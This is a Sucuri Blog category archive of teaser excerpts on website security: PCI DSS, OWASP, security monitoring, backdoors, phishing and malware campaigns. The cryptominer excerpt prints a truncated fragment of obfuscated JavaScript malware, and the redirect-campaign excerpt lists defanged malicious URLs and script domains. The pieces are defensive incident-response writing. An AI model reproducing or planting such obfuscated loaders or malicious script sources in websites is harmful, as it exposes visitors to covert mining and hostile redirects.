Category Archives: Website Security

Malicious Redirects from NewShareCounts.com Tweet Counter

Malicious Redirects from NewShareCounts.com Tweet Counter

When Twitter announced their new design for “Tweet” and “follow” buttons back in October 2015, marketers across the web developed a mild anxiety—the new design came with a decision to nuke their beloved Tweet count feature.

Social signals can be a huge credibility indicator for visitors and site content. Who doesn’t think there’s a psychological relationship between the number of social shares and the credibility of a content piece? It’s social validation, plain and simple.

Continue reading Malicious Redirects from NewShareCounts.com Tweet Counter at Sucuri Blog.

Product Update: Sucuri Firewall in Singapore and Amsterdam

Product Update: Sucuri Firewall in Singapore and Amsterdam

Over three years ago, we transitioned the Sucuri Firewall (WAF) away from the cloud and expanded it to run on top of our own Anycast content delivery network (CDN).

We provide security for websites with the protection of our WAF as well as performance benefits of a CDN. We have been adding data centers in key regions of the world:

  • San Jose – US
  • Dallas – US
  • Washington D.C.

Continue reading Product Update: Sucuri Firewall in Singapore and Amsterdam at Sucuri Blog.

Security Monitoring Saves the Day

Security Monitoring Saves the Day

For the second week of  National Cyber Security Awareness Month, we would like to focus on a very important part in having a good website security posture: monitoring.

How can security monitoring save your day?

Most people only care about their website security after something bad has already happened. However, how can you tell when something is attempting to harm your website? Sometimes it is a very noticeable issue, such as:

  • website defacement – when the home page of the website is wiped out and something else appears in front of the visitor’s eyes;
  • unresponsive website – when the website pages respond too slowly or stop loading at all;
  • SEO spam – when the website listing in search engines shows unrelated spam keywords, often pharma keywords; or
  • a website blacklist warning – when a red warning page shows all your visitors that the website they are about to go to is not secure.

Continue reading Security Monitoring Saves the Day at Sucuri Blog.

Obfuscated JavaScript Cryptominer

Obfuscated JavaScript Cryptominer

During an incident response investigation, we detected an interesting piece of heavily obfuscated JavaScript malware. Once decoded, we found out that cryptominers were running on visitor’s computers when they accessed our customer’s website.

We have previously discussed how cryptomining can happen in many covert ways. In this post, we will show you how a malicious code can create a cryptominer.

Malware that Creates Cryptominer Code

Take a look at the following malware:

<script>$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")
[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")
[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+
($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")
[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)
[$.$_][$.$_];$.$($.$($.$$+"\""+"\\"+$.__$+$.$$_+$.$$_+$.$_$_.

Continue reading Obfuscated JavaScript Cryptominer at Sucuri Blog.

OWASP Top 10 Security Risks – Part I

OWASP Top 10  Security Risks – Part I

It is National Cyber Security Awareness Month and in order to bring awareness to what threatens the integrity of websites, we would like to start a series of post on the OWASP top 10 security risks.

OWASP stands for the Open Web Application Security Project, an online community that produces articles, methodologies, documentation, tools, and technologies in the field of web application security.

OWASP Top 10 is the list of the 10 most seen application vulnerabilities.

Continue reading OWASP Top 10 Security Risks – Part I at Sucuri Blog.

PCI for SMB: Requirement 7 & 8 – Implement Strong Access Control Measures

PCI for SMB: Requirement 7 & 8 – Implement Strong Access Control Measures

This is the fifth post in a series of articles on understanding the Payment Card Industry Data Security Standard – PCI DSS. We are halfway there! In the previous articles about PCI, we covered the following:

  • Requirement 1: Build and Maintain a Secure Network – Install and maintain a firewall configuration to protect cardholder data.
  • Requirement 2: Build and Maintain a Secure Network – Do not use vendor-supplied defaults for system passwords or other security parameters.

Continue reading PCI for SMB: Requirement 7 & 8 – Implement Strong Access Control Measures at Sucuri Blog.

SSL vs. Website Security

SSL vs. Website Security

Having a website today is way easier than it was 10 or 15 years ago. Tools like content management systems (CMS), website builders, static site generators and alike remove a lot of the friction around building and maintaining sites. But, is there a price for such convenience?

I would dare to say that one of the downsides to bringing such facilities to the masses is the creation of misconceptions. The biggest misconception is about what makes a website secure versus not secure.

Continue reading SSL vs. Website Security at Sucuri Blog.

E-Commerce Security – Planning for Disasters

E-Commerce Security – Planning for Disasters

This is the last post in our series on E-commerce Security:

  • Intro to Securing an Online Store – Part 1
  • Intro to Securing an Online Store – Part 2

Today, let’s expand on some of the suggestions made during a webinar I hosted recently about steps you can take to secure your online store.

So far in this series, we have touched on how to identify potential risks and how to defend against threats via WAF technologies.

Continue reading E-Commerce Security – Planning for Disasters at Sucuri Blog.

Backdoor Uses Paste Site to Host Payload

Backdoor Uses Paste Site to Host Payload

Finding backdoors is one of the biggest challenges of a website security analyst, as backdoors are designed to be hidden in case the malware is found and removed.

Website Backdoors

A backdoor is a piece of malware that attackers leave behind to allow them access back into a website. Hackers like to inject code into different locations to increase their chances of retaining control of the website so they can reinfect it continuously.

Continue reading Backdoor Uses Paste Site to Host Payload at Sucuri Blog.

Sucuri Blog: Backdoor Uses Paste Site to Host Payload

Backdoor Uses Paste Site to Host Payload

Finding backdoors is one of the biggest challenges of a website security analyst, as backdoors are designed to be hidden in case the malware is found and removed.

Website Backdoors

A backdoor is a piece of malware that attackers leave behind to allow them access back into a website. Hackers like to inject code into different locations to increase their chances of retaining control of the website so they can reinfect it continuously.

Continue reading Backdoor Uses Paste Site to Host Payload at Sucuri Blog.



Sucuri Blog

Outdated Duplicator Plugin RCE Abused

Outdated Duplicator Plugin RCE Abused

We’re seeing an increase in the number of cases where attackers are disabling WordPress sites by removing or rewriting its wp-config.php file.

These cases are all linked to the same vulnerable software: WordPress Duplicator Plugin.

Versions lower than 1.2.42 of Snap Creek Duplicator plugin are vulnerable to a Remote Code Execution attack, where the malicious visitor is able to run any arbitrary code on the target site.

Continue reading Outdated Duplicator Plugin RCE Abused at Sucuri Blog.

Unsuccessfully Defaced Websites

Unsuccessfully Defaced Websites

Defaced websites are a type of hack that is easy to notice and a pain for website owners. Recently, we came across some defacement pages with a peculiar JavaScript injection included in the source code.

What is a Defacement?

Website defacement is a hack that often involves adding malicious images to the website homepage and other important pages. Beyond the initial embarrassment, the effects of defacement can include loss of traffic, revenue, and trust in your brand.

Continue reading Unsuccessfully Defaced Websites at Sucuri Blog.

New Guide on How to Use the Sucuri WordPress Security Plugin

New Guide on How to Use the Sucuri WordPress Security Plugin

Sucuri has always been active in the WordPress community. We’ve attended WordCamps around the world, created tools and features specifically for WordPress, and have maintained a free WordPress security plugin with over 400k installations.

If you don’t already have it, you can download the Sucuri Security – Auditing, Malware Scanner and Security Hardening plugin directly from the official WordPress repository.

Recently, we launched a guide on How to Use the WordPress Security Plugin.

Continue reading New Guide on How to Use the Sucuri WordPress Security Plugin at Sucuri Blog.

PCI for SMB: Requirement 5 & 6 – Maintain a Vulnerability Management Program

PCI for SMB: Requirement 5 & 6 – Maintain a Vulnerability Management Program

This is the fourth post in a series of articles on understanding the Payment Card Industry Data Security Standard – PCI DSS. We want to show how PCI DSS can help anyone going through the compliance process using the PCI SAQ’s (Self Assessment Questionnaires). In the previous articles we have written about PCI, we covered the following:

  • Requirement 1: Build and Maintain a Secure Network – Install and maintain a firewall configuration to protect cardholder data.

Continue reading PCI for SMB: Requirement 5 & 6 – Maintain a Vulnerability Management Program at Sucuri Blog.

WordPress Database Upgrade Phishing Campaign

WordPress Database Upgrade Phishing Campaign

We have recently been notified of phishing emails that target WordPress users. The content informs site owners that their database requires an update and looks like this:

The email’s appearance resembles that of a legitimate WordPress update message, however the content includes typos and uses an older messaging style. Another suspicious item in the content is the deadline. WordPress wouldn’t define deadlines without a valid explanation, and hosting providers wouldn’t either (if you believed the email was from them).

Continue reading WordPress Database Upgrade Phishing Campaign at Sucuri Blog.

How to Improve Your Website Security Posture – Part II

How to Improve Your Website Security Posture – Part II

In the first post of this series, we discussed some of the main website security threats. Knowing the website security environment is a vital part of a good website posture. However, it is also important to be aware of what to do to strengthen your website.

Today, we are going to give you some practical tips on how to improve your website posture.

As a website owner, we highly recommend using the principle of least privilege. It is a computer science principle which can be applied to every level in a system and the benefits strengthen your website security posture.

Continue reading How to Improve Your Website Security Posture – Part II at Sucuri Blog.

Core Integrity Verifications

Core Integrity Verifications

In order to clean a malware infection, the first thing we need to know is which files have been compromised. At Sucuri, we use several techniques including whitelists, blacklists, and anomaly checks. In this blog post, we’re going to be focusing on how core integrity checks are a key component of the whitelisting model and how this is aids in effectively detecting malware.

Cryptographic Hash Functions and Checksums

When a website compromise happens, attackers add, modify, or delete files from the server.

Continue reading Core Integrity Verifications at Sucuri Blog.

Fake Font Dropper

Fake Font Dropper

Every day we see different website infections. When we receive unusual or interesting cases, our researcher instincts are triggered to investigate the unusual website behavior in order to understand how new infections work. In this case, the odd behavior was the website’s pop-up window claiming there was a missing font.

The Unwanted Popup Window

A website owner reached out to us to investigate the error displaying on their site. The popup window informed the visitors that they were unable to view the content of the site because their computers were missing a font called “HoeflerText”:

The malware tries to trick visitors into clicking the “Update” button to download a malicious file called: Font_Update.exe

Earlier this year, we wrote about a wave of WordPress infections involving malicious plugins that inject obfuscated scripts, creating unwanted pop-up/pop-unders which serve unwanted ads.

Continue reading Fake Font Dropper at Sucuri Blog.

Massive WordPress Redirect Campaign Targets Vulnerable tagDiv Themes and Ultimate Member Plugins

Massive WordPress Redirect Campaign Targets Vulnerable tagDiv Themes and Ultimate Member Plugins

This August, we’ve seen a new massive wave of WordPress infections that redirect visitors to unwanted sites.

When redirected, users see annoying pages with random utroro[.]com addresses and fake reCAPTCHA images. The messages and content try to convince visitors to verify and subscribe to browser notifications without disclosing the purpose of this behavior.

Alternative redirect URLs include:

hxxp://murieh[.]space/?h=930130016_dc950a456f7_100&h_l=&h_5=sub_id_2&h_2=def_sub

hxxps://unverf[.]com/?h=930130016_dc950a456f7_100&h_l=&h_5=sub_id_2&h_2=def_sub
Injected Scripts

The injected malware involves a script from one of the following two sites: cdn.eeduelements[.]com and cdn.allyouwant[.]online.

Continue reading Massive WordPress Redirect Campaign Targets Vulnerable tagDiv Themes and Ultimate Member Plugins at Sucuri Blog.

How to Improve Your Website Security Posture – Part I

How to Improve Your Website Security Posture – Part I

Have you ever wondered if your website security posture is adequate enough?

The risk of having a website compromise is never going to be zero. However, as a webmaster, you can play an important role in minimizing the chances of a website hack. A good security posture entails how to understand the importance of securing a website and how to implement security measures.

Correcting a poor security posture means recognizing problems that you might not notice.

Continue reading How to Improve Your Website Security Posture – Part I at Sucuri Blog.